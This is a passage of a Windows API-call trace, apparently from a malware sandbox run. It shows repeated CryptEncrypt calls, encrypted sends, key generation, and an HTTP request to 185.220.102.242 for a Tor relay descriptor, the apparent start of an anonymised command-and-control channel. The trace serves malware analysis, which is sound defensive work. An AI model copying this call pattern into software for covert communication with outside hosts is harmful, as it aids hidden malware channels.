hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.321] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.322] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] malloc (_Size=0x1fd) returned 0x3df00e0 [0137.323] free (_Block=0x0) [0137.323] free (_Block=0x0) [0137.323] free (_Block=0x3d81e60) [0137.323] free (_Block=0x3594d18) [0137.323] malloc (_Size=0x1fd) returned 0x3594d18 [0137.323] free (_Block=0x0) [0137.323] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.323] free (_Block=0x0) [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.323] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.324] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] CryptEncrypt (in: hKey=0x432778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x339fa5c*=0x10) returned 1 [0137.325] malloc (_Size=0x1fd) returned 0x3df02e8 [0137.325] free (_Block=0x0) [0137.326] free (_Block=0x3df00e0) [0137.326] free (_Block=0x3d81e60) [0137.326] free (_Block=0x3594d18) [0137.326] malloc (_Size=0x202) returned 0x3d81e60 [0137.326] free (_Block=0x0) [0137.326] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa94, MessageSeqNo=0x0 | out: pMessage=0x339fa94) returned 0x0 [0137.326] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0137.327] free (_Block=0x3d81e60) [0137.327] free (_Block=0x3f65460) [0137.327] free (_Block=0x3df02e8) [0137.327] GetTickCount () returned 0x1163446 [0137.327] malloc (_Size=0x10) returned 0x3648d88 [0137.327] free (_Block=0x0) [0137.327] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d88*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0137.327] free (_Block=0x3648d88) [0137.327] GetTickCount () returned 0x1163446 [0137.328] malloc (_Size=0x10) returned 0x3648e48 [0137.328] free (_Block=0x0) [0137.328] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e48*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0137.732] free (_Block=0x3648e48) [0137.732] GetTickCount () returned 0x11635dc [0137.732] malloc (_Size=0x50) returned 0x3d9ab98 [0137.732] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c8 [0137.732] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5cc [0137.732] SetEvent (hEvent=0x5c8) returned 1 [0137.733] malloc (_Size=0x34) returned 0x3624770 [0137.733] malloc (_Size=0x338) returned 0x3df00e0 [0137.733] malloc (_Size=0x80) returned 0x609fa0 [0137.733] free (_Block=0x0) [0137.733] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x609fa0 | out: pbBuffer=0x609fa0) returned 1 [0137.733] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f720, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f71c | out: phKey=0x339f71c*=0x432e78) returned 1 [0137.738] CryptExportKey (in: hKey=0x432e78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f37c, pdwDataLen=0x339f364 | out: pbData=0x339f37c*, pdwDataLen=0x339f364*=0x90) returned 1 [0137.738] free (_Block=0x609fa0) [0137.738] malloc (_Size=0x10) returned 0x3648f20 [0137.738] free (_Block=0x0) [0137.738] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648f20 | out: pbBuffer=0x3648f20) returned 1 [0137.738] malloc (_Size=0x40) returned 0x3e22038 [0137.738] free (_Block=0x0) [0137.738] malloc (_Size=0x104) returned 0x3594d18 [0137.738] free (_Block=0x3e22038) [0137.738] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x606770, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339f91c, pcbStructInfo=0x339f8f4 | out: pvStructInfo=0x339f91c, pcbStructInfo=0x339f8f4) returned 1 [0137.739] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f91c, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339f918 | out: phKey=0x339f918*=0x432bf8) returned 1 [0137.739] malloc (_Size=0x80) returned 0x609fa0 [0137.739] free (_Block=0x0) [0137.739] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x609fa0*, pdwDataLen=0x339f8e8*=0x56, dwBufLen=0x80 | out: pbData=0x609fa0*, pdwDataLen=0x339f8e8*=0x80) returned 1 [0137.739] CryptDestroyKey (hKey=0x432bf8) returned 1 [0137.739] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f9b8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339f9b4 | out: phKey=0x339f9b4*=0x432bf8) returned 1 [0137.739] CryptSetKeyParam (hKey=0x432bf8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0137.739] malloc (_Size=0x3a) returned 0x3e22500 [0137.739] free (_Block=0x0) [0137.739] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10) returned 1 [0137.740] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10) returned 1 [0137.740] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10) returned 1 [0137.740] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8c8*, pdwDataLen=0x339f82c*=0x10) returned 1 [0137.740] CryptDestroyKey (hKey=0x432bf8) returned 1 [0137.740] malloc (_Size=0x100) returned 0x3df0420 [0137.740] free (_Block=0x0) [0137.740] free (_Block=0x0) [0137.740] free (_Block=0x3e22500) [0137.740] free (_Block=0x609fa0) [0137.740] free (_Block=0x3594d18) [0137.740] free (_Block=0x3648f20) [0137.740] malloc (_Size=0xba) returned 0x605a18 [0137.740] free (_Block=0x0) [0137.740] malloc (_Size=0x202) returned 0x3d81e60 [0137.740] free (_Block=0x0) [0137.740] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa04, MessageSeqNo=0x0 | out: pMessage=0x339fa04) returned 0x0 [0137.740] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0137.741] free (_Block=0x3d81e60) [0137.741] free (_Block=0x605a18) [0137.741] free (_Block=0x3df0420) [0137.741] GetTickCount () returned 0x11635fc [0137.741] malloc (_Size=0x10) returned 0x3648e30 [0137.741] free (_Block=0x0) [0137.741] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e30*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0137.742] free (_Block=0x3648e30) [0137.742] GetTickCount () returned 0x11635fc [0137.742] malloc (_Size=0x10) returned 0x3648de8 [0137.742] free (_Block=0x0) [0137.742] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648de8*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0137.993] free (_Block=0x3648de8) [0137.993] GetTickCount () returned 0x11636e6 [0137.993] SetEvent (hEvent=0x5c8) returned 1 [0137.993] malloc (_Size=0x34) returned 0x3624230 [0137.993] malloc (_Size=0x338) returned 0x3def010 [0137.993] malloc (_Size=0x80) returned 0x60a4f0 [0137.994] free (_Block=0x0) [0137.994] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a4f0 | out: pbBuffer=0x60a4f0) returned 1 [0137.994] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f730, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f72c | out: phKey=0x339f72c*=0x432d38) returned 1 [0137.998] CryptExportKey (in: hKey=0x432d38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f38c, pdwDataLen=0x339f374 | out: pbData=0x339f38c*, pdwDataLen=0x339f374*=0x90) returned 1 [0137.998] free (_Block=0x60a4f0) [0137.998] CryptBinaryToStringA (in: pbBinary=0x3e268c8, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x339fa34 | out: pszString=0x0, pcchString=0x339fa34) returned 1 [0137.998] malloc (_Size=0x29) returned 0x3624950 [0137.998] free (_Block=0x0) [0137.999] CryptBinaryToStringA (in: pbBinary=0x3e268c8, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624950, pcchString=0x339fa34 | out: pszString="7292ef58742cc793f7ab3846d87001178328f9a2", pcchString=0x339fa34) returned 1 [0137.999] malloc (_Size=0x10) returned 0x3648d10 [0137.999] free (_Block=0x0) [0137.999] malloc (_Size=0x10) returned 0x3648c80 [0137.999] free (_Block=0x0) [0137.999] malloc (_Size=0x38) returned 0x36245f0 [0137.999] free (_Block=0x3648c80) [0137.999] malloc (_Size=0x8) returned 0x3f4c0f8 [0137.999] free (_Block=0x0) [0137.999] malloc (_Size=0x10) returned 0x3648e78 [0137.999] free (_Block=0x0) [0137.999] malloc (_Size=0x50) returned 0x3d9abf0 [0137.999] free (_Block=0x3648e78) [0137.999] malloc (_Size=0x150) returned 0x3d81168 [0137.999] free (_Block=0x3d9abf0) [0137.999] malloc (_Size=0x550) returned 0x3def350 [0137.999] free (_Block=0x3d81168) [0137.999] malloc (_Size=0x1550) returned 0x3f68010 [0137.999] free (_Block=0x3def350) [0138.000] malloc (_Size=0x5550) returned 0x348c1b8 [0138.000] free (_Block=0x3f68010) [0138.000] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x339f95c | out: pbBuffer=0x339f95c) returned 1 [0138.000] free (_Block=0x348c1b8) [0138.000] free (_Block=0x0) [0138.000] free (_Block=0x0) [0138.000] free (_Block=0x3f4c0f8) [0138.000] inet_ntoa (in=0xf266dcb9) returned="185.220.102.242" [0138.000] malloc (_Size=0x10) returned 0x3648e90 [0138.000] free (_Block=0x0) [0138.000] gethostbyname (name="185.220.102.242") returned 0x42b838*(h_name="185.220.102.242", h_aliases=0x42b848*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42b84c*=([0]="185.220.102.242")) [0138.001] htons (hostshort=0x50) returned 0x5000 [0138.001] socket (af=2, type=1, protocol=6) returned 0x5d0 [0138.001] connect (s=0x5d0, name=0x339f938*(sa_family=2, sin_port=0x50, sin_addr="185.220.102.242"), namelen=16) returned 0 [0138.028] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339f900) returned 95 [0138.028] malloc (_Size=0x60) returned 0x60dfb0 [0138.028] free (_Block=0x0) [0138.028] vsprintf_s (in: _DstBuf=0x60dfb0, _SizeInBytes=0x60, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x339f900 | out: _DstBuf="GET /tor/server/fp/7292ef58742cc793f7ab3846d87001178328f9a2 HTTP/1.0\r\nHost: 185.220.102.242\r\n\r\n") returned 95 [0138.028] send (s=0x5d0, buf=0x60dfb0*, len=96, flags=0) returned 96 [0138.029] recv (in: s=0x5d0, buf=0x339e8fc, len=4096, flags=0 | out: buf=0x339e8fc*) returned 2000 [0138.058] malloc (_Size=0x7d1) returned 0x60cdc0 [0138.058] free (_Block=0x0) [0138.058] recv (in: s=0x5d0, buf=0x339e8fc, len=4096, flags=0 | out: buf=0x339e8fc*) returned 674 [0138.059] malloc (_Size=0xbb9) returned 0x3f68010 [0138.059] free (_Block=0x60cdc0) [0138.059] recv (in: s=0x5d0, buf=0x339e8fc, len=4096, flags=0 | out: buf=0x339e8fc) returned 0 [0138.059] closesocket (s=0x5d0) returned 0 [0138.060] malloc (_Size=0x9bc) returned 0x60cdc0 [0138.060] free (_Block=0x0) [0138.060] free (_Block=0x3f68010) [0138.060] free (_Block=0x60dfb0) [0138.060] closesocket (s=0xffffffff) returned -1 [0138.060] free (_Block=0x0) [0138.060] free (_Block=0x3648e90) [0138.060] free (_Block=0x0) [0138.060] free (_Block=0x36245f0) [0138.060] free (_Block=0x3648d10) [0138.060] free (_Block=0x3624950) [0138.060] malloc (_Size=0x9bc) returned 0x3f68010 [0138.060] free (_Block=0x0) [0138.060] malloc (_Size=0x2c) returned 0x36249c0 [0138.060] free (_Block=0x0) [0138.060] malloc (_Size=0x40) returned 0x3e226f8 [0138.060] free (_Block=0x0) [0138.060] free (_Block=0x0) [0138.060] memchr (_Buf=0x3f6803c, _Val=10, _MaxCount=0x98f) returned 0x3f6804c [0138.061] malloc (_Size=0x11) returned 0x3f653c0 [0138.061] free (_Block=0x0) [0138.061] free (_Block=0x0) [0138.061] memchr (_Buf=0x3f6804d, _Val=10, _MaxCount=0x97e) returned 0x3f68069 [0138.061] malloc (_Size=0x1d) returned 0x3d800d0 [0138.061] free (_Block=0x0) [0138.061] free (_Block=0x0) [0138.061] memchr (_Buf=0x3f6806a, _Val=10, _MaxCount=0x961) returned 0x3f680aa [0138.061] malloc (_Size=0x41) returned 0x3defdb0 [0138.061] free (_Block=0x0) [0138.061] free (_Block=0x0) [0138.061] memchr (_Buf=0x3f680ab, _Val=10, _MaxCount=0x920) returned 0x3f680eb [0138.061] malloc (_Size=0x41) returned 0x3defd60 [0138.061] free (_Block=0x0) [0138.061] malloc (_Size=0x140) returned 0x3dd3d50 [0138.061] free (_Block=0x3e226f8) [0138.061] free (_Block=0x0) [0138.061] memchr (_Buf=0x3f680ec, _Val=10, _MaxCount=0x8df) returned 0x3f68128 [0138.061] malloc (_Size=0x3d) returned 0x3e22548 [0138.061] free (_Block=0x0) [0138.061] free (_Block=0x0) [0138.061] memchr (_Buf=0x3f68129, _Val=10, _MaxCount=0x8a2) returned 0x3f68143 [0138.061] malloc (_Size=0x1b) returned 0x3d803f0 [0138.061] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f68144, _Val=10, _MaxCount=0x887) returned 0x3f68182 [0138.062] malloc (_Size=0x3f) returned 0x3e220c8 [0138.062] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f68183, _Val=10, _MaxCount=0x848) returned 0x3f681a8 [0138.062] malloc (_Size=0x26) returned 0x60dd98 [0138.062] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f681a9, _Val=10, _MaxCount=0x822) returned 0x3f681c7 [0138.062] malloc (_Size=0x1f) returned 0x3d80120 [0138.062] free (_Block=0x0) [0138.062] free (_Block=0x0) [0138.062] memchr (_Buf=0x3f681c8, _Val=10, 